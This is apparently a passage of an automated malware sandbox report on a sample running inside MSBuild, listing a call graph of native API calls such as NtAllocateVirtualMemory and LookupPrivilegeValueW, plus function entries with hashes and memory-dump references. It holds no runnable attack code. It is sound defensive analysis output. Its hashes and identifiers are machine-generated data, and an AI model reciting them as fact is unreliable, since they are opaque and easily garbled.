30551->30552 30553 41ee23 LdrLoadDll 30552->30553 30554 41f0b8 30553->30554 30555 41ee23 LdrLoadDll 30554->30555 30556 41f0c4 30555->30556 30557 41ee23 LdrLoadDll 30556->30557 30558 41f0cd 30557->30558 30559 41ee23 LdrLoadDll 30558->30559 30560 41f0d6 30559->30560 30561 41ee23 LdrLoadDll 30560->30561 30562 41f0df 30561->30562 30563 41ee23 LdrLoadDll 30562->30563 30564 41f0e8 30563->30564 30565 41ee23 LdrLoadDll 30564->30565 30566 41f0f1 30565->30566 30567 41ee23 LdrLoadDll 30566->30567 30568 41f0fd 30567->30568 30569 41ee23 LdrLoadDll 30568->30569 30570 41f106 30569->30570 30571 41ee23 LdrLoadDll 30570->30571 30572 41f10f 30571->30572 30572->30340 30574 41f1a3 LdrLoadDll 30573->30574 30575 41e0af 30574->30575 30605 10e9860 LdrInitializeThunk 30575->30605 30576 41e0c6 30576->30273 30578->30338 30580 41f1a3 LdrLoadDll 30579->30580 30581 41e72f NtAllocateVirtualMemory 30580->30581 30581->30450 30583 421283 30582->30583 30584 421289 30582->30584 30583->30455 30585 4201e3 2 API calls 30584->30585 30586 4212af 30585->30586 30586->30455 30588 421313 30587->30588 30589 421370 30588->30589 30590 4201e3 2 API calls 30588->30590 30589->30463 30591 42134d 30590->30591 30592 420103 2 API calls 30591->30592 30592->30589 30593->30459 30594->30473 30595->30475 30596->30478 30597->30480 30598->30482 30600 41ee3e 30599->30600 30601 4195b3 LdrLoadDll 30600->30601 30602 41ee5e 30601->30602 30603 4195b3 LdrLoadDll 30602->30603 30604 41ef12 30602->30604 30603->30604 30604->30496 30604->30604 30605->30576 30607 10e968f LdrInitializeThunk 30606->30607 30608 10e9681 30606->30608 30607->30346 30608->30346 30610 41f1a3 LdrLoadDll 30609->30610 30611 41e85f RtlFreeHeap 30610->30611 30611->30350 30613 4094a3 30612->30613 30614 40949e 30612->30614 30615 420083 2 API calls 30613->30615 30614->30281 30622 4094c8 30615->30622 30616 40952b 30616->30281 30617 41e093 2 API calls 30617->30622 30618 409531 30620 409557 30618->30620 30621 41e793 2 API calls 30618->30621 30620->30281 30623 409548 30621->30623 30622->30616 30622->30617 30622->30618 30624 420083 2 API calls 30622->30624 30628 41e793 30622->30628 30623->30281 30624->30622 30626 409771 30625->30626 30627 41e793 2 API calls 30625->30627 30626->30242 30627->30626 30629 41f1a3 LdrLoadDll 30628->30629 30630 41e7af 30629->30630 30633 10e96e0 LdrInitializeThunk 30630->30633 30631 41e7c6 30631->30622 30633->30631 30635 41f866 30634->30635 30638 40cf43 30635->30638 30639 40cf67 30638->30639 30640 40cfa3 LdrLoadDll 30639->30640 30641 40bdee 30639->30641 30640->30641 30641->30250 30643 40d2b6 30642->30643 30645 40d333 30643->30645 30657 41de63 LdrLoadDll 30643->30657 30645->30255 30647 41f1a3 LdrLoadDll 30646->30647 30648 40fefe 30647->30648 30648->30258 30649 41e9a3 30648->30649 30650 41f1a3 LdrLoadDll 30649->30650 30651 41e9c2 LookupPrivilegeValueW 30650->30651 30651->30260 30653 41f1a3 LdrLoadDll 30652->30653 30654 41e44f 30653->30654 30658 10e9910 LdrInitializeThunk 30654->30658 30655 41e46e 30655->30261 30657->30645 30658->30655 30660 40d43a 30659->30660 30661 40d293 LdrLoadDll 30660->30661 30662 40d49d 30661->30662 30662->30212 30664 40ffed 30663->30664 30672 4100a3 30663->30672 30665 40d293 LdrLoadDll 30664->30665 30666 41000f 30665->30666 30673 41e113 30666->30673 30668 410051 30676 41e153 30668->30676 30671 41e663 2 API calls 30671->30672 30672->30215 30672->30217 30674 41f1a3 LdrLoadDll 30673->30674 30675 41e12f 30674->30675 30675->30668 30677 41f1a3 LdrLoadDll 30676->30677 30678 41e16f 30677->30678 30681 10e9fe0 LdrInitializeThunk 30678->30681 30679 410097 30679->30671 30681->30679 30683 40ddde 30682->30683 30684 40d413 LdrLoadDll 30683->30684 30685 40de35 30684->30685 30718 40d093 30685->30718 30687 40e0ac 30687->30229 30688 40de5b 30688->30687 30727 418ad3 30688->30727 30690 40dea0 30690->30687 30730 40a0b3 30690->30730 30692 40dee4 30692->30687 30752 41e6d3 30692->30752 30696 40df3a 30697 40df41 30696->30697 30764 41e1e3 30696->30764 30698 420103 2 API calls 30697->30698 30700 40df4e 30698->30700 30700->30229 30702 40df8b 30703 420103 2 API calls 30702->30703 30704 40df92 30703->30704 30704->30229 30705 40df9b 30706 410193 3 API calls 30705->30706 30707 40e00f 30706->30707 30707->30697 30708 40e01a 30707->30708 30709 420103 2 API calls 30708->30709 30710 40e03e 30709->30710 30769 41e233 30710->30769 30713 41e1e3 2 API calls 30714 40e079 30713->30714 30714->30687 30774 41dff3 30714->30774 30717 41e883 2 API calls 30717->30687 30719 40d0a0 30718->30719 30720 40d0a4 30718->30720 30719->30688 30721 40d0bd 30720->30721 30722 40d0ef 30720->30722 30779 41dea3 LdrLoadDll 30721->30779 30780 41dea3 LdrLoadDll 30722->30780 30724 40d100 30724->30688 30726 40d0df 30726->30688 30728 410193 3 API calls 30727->30728 30729 418af9 30728->30729 30729->30690 30781 40a2e3 30730->30781 30732 40a0d1 30733 40a1af 30732->30733 30734 409493 4 API calls 30732->30734 30735 40a2d9 30732->30735 30733->30735 30736 409493 4 API calls 30733->30736 30739 40a28f 30733->30739 30744 40a10f 30734->30744 30735->30692 30749 40a1ec 30736->30749 30738 40a2a3 30738->30735 30829 410403 10 API calls 30738->30829 30739->30735 30828 410403 10 API calls 30739->30828 30741 40a2b9 30741->30735 30830 410403 10 API calls 30741->30830 30743 40a2cf 30743->30692 30744->30733 30746 40a1a5 30744->30746 30795 409d93 30744->30795 30748 409753 2 API calls 30746->30748 30747 409d93 14 API calls 30747->30749 30748->30733 30749->30739 30749->30747 30750 40a285 30749->30750 30751 409753 2 API calls 30750->30751 30751->30739 30753 41f1a3 LdrLoadDll 30752->30753 30754 41e6ef 30753->30754 30912 10e98f0 LdrInitializeThunk 30754->30912 30755 40df1b 30757 410193 30755->30757 30758 4101b0 30757->30758 30913 41e193 30758->30913 30761 4101f8 30761->30696 30762 41e1e3 2 API calls 30763 410221 30762->30763 30763->30696 30765 41f1a3 LdrLoadDll 30764->30765 30766 41e1ff 30765->30766 30919 10e9780 LdrInitializeThunk 30766->30919 30767 40df7e 30767->30702 30767->30705 30770 41f1a3 LdrLoadDll 30769->30770 30771 41e24f 30770->30771 30920 10e97a0 LdrInitializeThunk 30771->30920 30772 40e052 30772->30713 30775 41f1a3 LdrLoadDll 30774->30775 30776 41e00f 30775->30776 30921 10e9a20 LdrInitializeThunk 30776->30921 30777 40e0a5 30777->30717 30779->30726 30780->30724 30782 40a30a 30781->30782 30783 409493 4 API calls 30782->30783 30790 40a56f 30782->30790 30784 40a35d 30783->30784 30785 409753 2 API calls 30784->30785 30784->30790 30786 40a3ec 30785->30786 30787 409493 4 API calls 30786->30787 30786->30790 30788 40a401 30787->30788 30789 409753 2 API calls 30788->30789 30788->30790 30792 40a461 30789->30792 30790->30732 30791 409493 4 API calls 30791->30792 30792->30790 30792->30791 30793 409d93 14 API calls 30792->30793 30794 409753 2 API calls 30792->30794 30793->30792 30794->30792 30796 409db8 30795->30796 30831 41dee3 30796->30831 30799 409e0c 30799->30744 30800 409e8d 30864 4102e3 LdrLoadDll NtClose 30800->30864 30801 41e0d3 2 API calls 30802 409e30 30801->30802 30802->30800 30804 409e3b 30802->30804 30811 409eb9 30804->30811 30834 40e0c3 30804->30834 30805 409ea8 30806 409eaf 30805->30806 30809 409ec5 30805->30809 30808 41e663 2 API calls 30806->30808 30808->30811 30865 41df63 LdrLoadDll 30809->30865 30810 409e55 30810->30811 30854 409bc3 30810->30854 30811->30744 30813 409ef0 30815 40e0c3 5 API calls 30813->30815 30817 409f10 30815->30817 30817->30811 30866 41df93 LdrLoadDll 30817->30866 30819 409f35 30867 41e023 LdrLoadDll 30819->30867 30821 409f4f 30822 41dff3 2 API calls 30821->30822 30823 409f5e 30822->30823 30824 41e663 2 API calls 30823->30824 30825 409f68 30824->30825 30868 409993 30825->30868 30827 409f7c 30827->30744 30828->30738 30829->30741 30830->30743 30832 41f1a3 LdrLoadDll 30831->30832 30833 409e02 30832->30833 30833->30799 30833->30800 30833->30801 30835 40e0f1 30834->30835 30836 410193 3 API calls 30835->30836 30837 40e153 30836->30837 30838 40e19c 30837->30838 30839 41e1e3 2 API calls 30837->30839 30838->30810 30840 40e17e 30839->30840 30841 40e188 30840->30841 30845 40e1a8 30840->30845 30842 41e233 2 API calls 30841->30842 30843 40e192 30842->30843 30844 41e663 2 API calls 30843->30844 30844->30838 30846 40e232 30845->30846 30847 40e215 30845->30847 30849 41e233 2 API calls 30846->30849 30848 41e663 2 API calls 30847->30848 30850 40e21f 30848->30850 30851 40e241 30849->30851 30850->30810 30852 41e663 2 API calls 30851->30852 30853 40e24b 30852->30853 30853->30810 30855 409bd9 30854->30855 30860 409d64 30855->30860 30884 409793 30855->30884 30857 409cd8 30858 409993 11 API calls 30857->30858 30857->30860 30859 409d06 30858->30859 30859->30860 30861 41e0d3 2 API calls 30859->30861 30860->30744 30862 409d3b 30861->30862 30862->30860 30863 41e6d3 2 API calls 30862->30863 30863->30860 30864->30805 30865->30813 30866->30819 30867->30821 30869 4099bc 30868->30869 30891 4098f3 30869->30891 30872 41e6d3 2 API calls 30873 4099cf 30872->30873 30873->30872 30874 409a5a 30873->30874 30877 409a55 30873->30877 30899 410363 30873->30899 30874->30827 30875 41e663 2 API calls 30876 409a8d 30875->30876 30876->30874 30878 41dee3 LdrLoadDll 30876->30878 30877->30875 30879 409af2 30878->30879 30879->30874 30903 41df23 30879->30903 30881 409b56 30881->30874 30882 4191a3 8 API calls 30881->30882 30883 409bab 30882->30883 30883->30827 30885 409892 30884->30885 30886 4097a8 30884->30886 30885->30857 30886->30885 30887 4191a3 8 API calls 30886->30887 30888 409815 30887->30888 30889 420103 2 API calls 30888->30889 30890 40983c 30888->30890 30889->30890 30890->30857 30892 40990d 30891->30892 30893 40cf43 LdrLoadDll 30892->30893 30894 409928 30893->30894 30895 4195b3 LdrLoadDll 30894->30895 30896 409940 30895->30896 30897 40995c 30896->30897 30898 409949 PostThreadMessageW 30896->30898 30897->30873 30898->30897 30900 410376 30899->30900 30906 41e063 30900->30906 30904 41f1a3 LdrLoadDll 30903->30904 30905 41df3f 30904->30905 30905->30881 30907 41f1a3 LdrLoadDll 30906->30907 30908 41e07f 30907->30908 30911 10e9840 LdrInitializeThunk 30908->30911 30909 4103a1 30909->30873 30911->30909 30912->30755 30914 41f1a3 LdrLoadDll 30913->30914 30915 41e1af 30914->30915 30918 10e99a0 LdrInitializeThunk 30915->30918 30916 4101f1 30916->30761 30916->30762 30918->30916 30919->30767 30920->30772 30921->30777 30922 4200c3 30925 41e753 30922->30925 30926 41f1a3 LdrLoadDll 30925->30926 30927 41e76f 30926->30927 30930 10e9a00 LdrInitializeThunk 30927->30930 30928 41e78a 30930->30928 30931 40b503 30932 40b528 30931->30932 30933 40cf43 LdrLoadDll 30932->30933 30934 40b55b 30933->30934 30936 40b580 30934->30936 30937 40eb13 30934->30937 30938 40eb3f 30937->30938 30939 41e3b3 LdrLoadDll 30938->30939 30940 40eb58 30939->30940 30941 40eb5f 30940->30941 30948 41e3f3 30940->30948 30941->30936 30945 40eb9a 30946 41e663 2 API calls 30945->30946 30947 40ebbd 30946->30947 30947->30936 30949 41f1a3 LdrLoadDll 30948->30949 30950 41e40f 30949->30950 30954 10e9710 LdrInitializeThunk 30950->30954 30951 40eb82 30951->30941 30953 41e9e3 LdrLoadDll 30951->30953 30953->30945 30954->30951 30955 10e9540 LdrInitializeThunk

                                                                                                Executed Functions

                                                                                                Function 0041E533 Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 121 41e533-41e584 call 41f1a3 NtCreateFile
                                                                                                APIs
                                                                                                • NtCreateFile.NTDLL(00000060,00000000,?,0041930F,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,0041930F,?,00000000,00000060,00000000,00000000), ref: 0041E580
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.485479676.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_401000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CreateFile
                                                                                                • String ID:
                                                                                                • API String ID: 823142352-0
                                                                                                • Opcode ID: 0e100477f5381d3d7289312ef97c1911a17bc4e8064b3a3f2b56bd156d4f763d
                                                                                                • Instruction ID: bee90c2b06a91e8d7ddb0d9ebda198b2fdf455160e2ca5426b1dbaa36c462bf3
                                                                                                • Opcode Fuzzy Hash: 0e100477f5381d3d7289312ef97c1911a17bc4e8064b3a3f2b56bd156d4f763d
                                                                                                • Instruction Fuzzy Hash: 2AF06DB2215208ABCB48DF89DC85EEB77ADAF8C754F158258BA0D97241D630E8518BA4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0041E5E3 Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 124 41e5e3-41e62c call 41f1a3 NtReadFile
                                                                                                APIs
                                                                                                • NtReadFile.NTDLL(004194D3,004149AD,FFFFFFFF,00418FBD,00000002,?,004194D3,00000002,00418FBD,FFFFFFFF,004149AD,004194D3,00000002,00000000), ref: 0041E628
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.485479676.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_401000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: FileRead
                                                                                                • String ID:
                                                                                                • API String ID: 2738559852-0
                                                                                                • Opcode ID: 844797972357584b4267d2b4ccdf650626f96eee6e100a2b7eb001bcc7868e0e
                                                                                                • Instruction ID: 1a3214232952a8e6833d8534ab6b6d105d0d062ce0fc1dd5f8c337f4470e1cc8
                                                                                                • Opcode Fuzzy Hash: 844797972357584b4267d2b4ccdf650626f96eee6e100a2b7eb001bcc7868e0e
                                                                                                • Instruction Fuzzy Hash: 25F0AFB2214208ABCB14DF99DC85EEB77ADAF8C754F118259BA0DA7241D630E8118BA5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0041E713 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 127 41e713-41e750 call 41f1a3 NtAllocateVirtualMemory
                                                                                                APIs
                                                                                                • NtAllocateVirtualMemory.NTDLL(00010000,?,00000000,004035B7,00000004,00001000,00000000), ref: 0041E74C
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.485479676.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_401000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AllocateMemoryVirtual
                                                                                                • String ID:
                                                                                                • API String ID: 2167126740-0
                                                                                                • Opcode ID: 007d9bb2bc6f869d9d5f2aff9c303a90246c852ee550cafd5b2adb6fd69cc88f
                                                                                                • Instruction ID: fc69ad288b6635a52355ed1933f6cfc63b81cbe29d7af1dca7c736bb41164d96
                                                                                                • Opcode Fuzzy Hash: 007d9bb2bc6f869d9d5f2aff9c303a90246c852ee550cafd5b2adb6fd69cc88f
                                                                                                • Instruction Fuzzy Hash: AAF01EB2210208ABCB18DF89DC81EEB77ADAF88754F018219BE0897241C630F811CBB4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0041E663 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 144 41e663-41e68c call 41f1a3 NtClose
                                                                                                APIs
                                                                                                • NtClose.NTDLL(00410348,00000000,?,00410348,?,?,?,?,?,?,?,00000000,?,00000000), ref: 0041E688
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.485479676.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_401000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Close
                                                                                                • String ID:
                                                                                                • API String ID: 3535843008-0
                                                                                                • Opcode ID: 675b6986af3fbe89ca5381cf45abfbeb38fb14a73c53f9364842799534e556c6
                                                                                                • Instruction ID: 94e5ee63b43bdcb99c94ba18f59b3c55f276505dfa29a4d302564c7b8ad5ff88
                                                                                                • Opcode Fuzzy Hash: 675b6986af3fbe89ca5381cf45abfbeb38fb14a73c53f9364842799534e556c6
                                                                                                • Instruction Fuzzy Hash: BDD01772604214BBE610EBA9DC89FD77BACDF88664F018469BA1C5B242C571FA0086E1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 010E9910 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: 48a776485f53181a72a9bebb908dd89d8f33b3f9e8e0a64a55973dd36e97225e
                                                                                                • Instruction ID: ac7c751a508f939a2a7a5f6a58e1123b1d558087e451960da53b08f039a1a200
                                                                                                • Opcode Fuzzy Hash: 48a776485f53181a72a9bebb908dd89d8f33b3f9e8e0a64a55973dd36e97225e
                                                                                                • Instruction Fuzzy Hash: 9D9002B120100902D140719984057460105A7D0341F52C015A6454594EC6998DD577E5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 010E99A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: 38a6fd7f893809d0386616a7cae53e43c1b71ae668fe3563d6142fd8e1ce5a81
                                                                                                • Instruction ID: 0c1dadb93d61d071b1e3ced5ab32582c8fae4c0c8400c2d56428ae14c8bcabc4
                                                                                                • Opcode Fuzzy Hash: 38a6fd7f893809d0386616a7cae53e43c1b71ae668fe3563d6142fd8e1ce5a81
                                                                                                • Instruction Fuzzy Hash: 6C9002A134100942D10061998415B060105E7E1341F52C019E2454594DC659CC5272A6
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 010E9840 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: 7d743b1cff0bb6f93c71e534ab77e5a0d1f816e5ee7501a6062e5155045ca131
                                                                                                • Instruction ID: 41079aee4c22e9cef834cfa9ea55d90f02f3fe40819f1cf1bd8aa1def07f4cf4
                                                                                                • Opcode Fuzzy Hash: 7d743b1cff0bb6f93c71e534ab77e5a0d1f816e5ee7501a6062e5155045ca131
                                                                                                • Instruction Fuzzy Hash: EA900261242046525545B19984056074106B7E0281792C016A2804990CC5669856F7A1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 010E9860 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: 3382f177101fff6bcd00e92ae2338c1cd2f1718b5d32ee0a2824ab5aa0aa588a
                                                                                                • Instruction ID: 491aa21a32eb54d4a64ffbacddb0143599f8cea63106d073d5090152b8518c70
                                                                                                • Opcode Fuzzy Hash: 3382f177101fff6bcd00e92ae2338c1cd2f1718b5d32ee0a2824ab5aa0aa588a
                                                                                                • Instruction Fuzzy Hash: D590027120100913D111619985057070109A7D0281F92C416A1814598DD6968952B2A1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 010E98F0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: bb74c9f56250604d891e9aa6924581e3877532a016dedfbe410679ec19ddccb6
                                                                                                • Instruction ID: b7dd56b3a529717e04a8f6171328ea547e4fb21ec28428ab6a3e55c6eb0c62f0
                                                                                                • Opcode Fuzzy Hash: bb74c9f56250604d891e9aa6924581e3877532a016dedfbe410679ec19ddccb6
                                                                                                • Instruction Fuzzy Hash: D090026160100A02D10171998405716010AA7D0281F92C026A2414595ECA658992B2B1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 010E9A00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: d26e1b4303cd7f46812d4719696319d2a6d7e255385382b6c0fb8a4bb53f6da6
                                                                                                • Instruction ID: 3dd1c6551a337ef60c0fcb4b75f4d83c1f0ec2d150e4ae3b5fd6d4f3cc19cb0d
                                                                                                • Opcode Fuzzy Hash: d26e1b4303cd7f46812d4719696319d2a6d7e255385382b6c0fb8a4bb53f6da6
                                                                                                • Instruction Fuzzy Hash: A590027120140902D1006199881570B0105A7D0342F52C015A2554595DC665885176F1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 010E9A20 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: a685a53903f439a6ccf9395023cce19206c18d5c471b4fa9293168476a071183
                                                                                                • Instruction ID: 39e869b06fcda9d64084810429df7ee42a7d50badf31168be3d1f745bd2354ec
                                                                                                • Opcode Fuzzy Hash: a685a53903f439a6ccf9395023cce19206c18d5c471b4fa9293168476a071183
                                                                                                • Instruction Fuzzy Hash: 4790026160100542414071A9C845A064105BBE1251752C125A1D88590DC599886577E5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 010E9A50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: 7f27567aaba6342b6332b989ab2ee607f90fdf2df674065a8d6db8d3974312e3
                                                                                                • Instruction ID: 19d8e745abce0c4444377d01b7f55b794aeba43da411074f4ff211f181523d2d
                                                                                                • Opcode Fuzzy Hash: 7f27567aaba6342b6332b989ab2ee607f90fdf2df674065a8d6db8d3974312e3
                                                                                                • Instruction Fuzzy Hash: 6390026121180542D20065A98C15B070105A7D0343F52C119A1544594CC955886176A1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 010E9540 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 154 10e9540-10e954c LdrInitializeThunk
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: 925b743f875d9a2ba7f202c692c4ecc1cd9bace67b7708b36950df68a5c74015
                                                                                                • Instruction ID: a7e4dc6802f3816b027c3f3c6e3de732c1ee87979de43142605eb919faf77045
                                                                                                • Opcode Fuzzy Hash: 925b743f875d9a2ba7f202c692c4ecc1cd9bace67b7708b36950df68a5c74015
                                                                                                • Instruction Fuzzy Hash: E0900265211005030105A59947056070146A7D5391352C025F2405590CD661886172A1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 010E95D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                Download Yara Rule

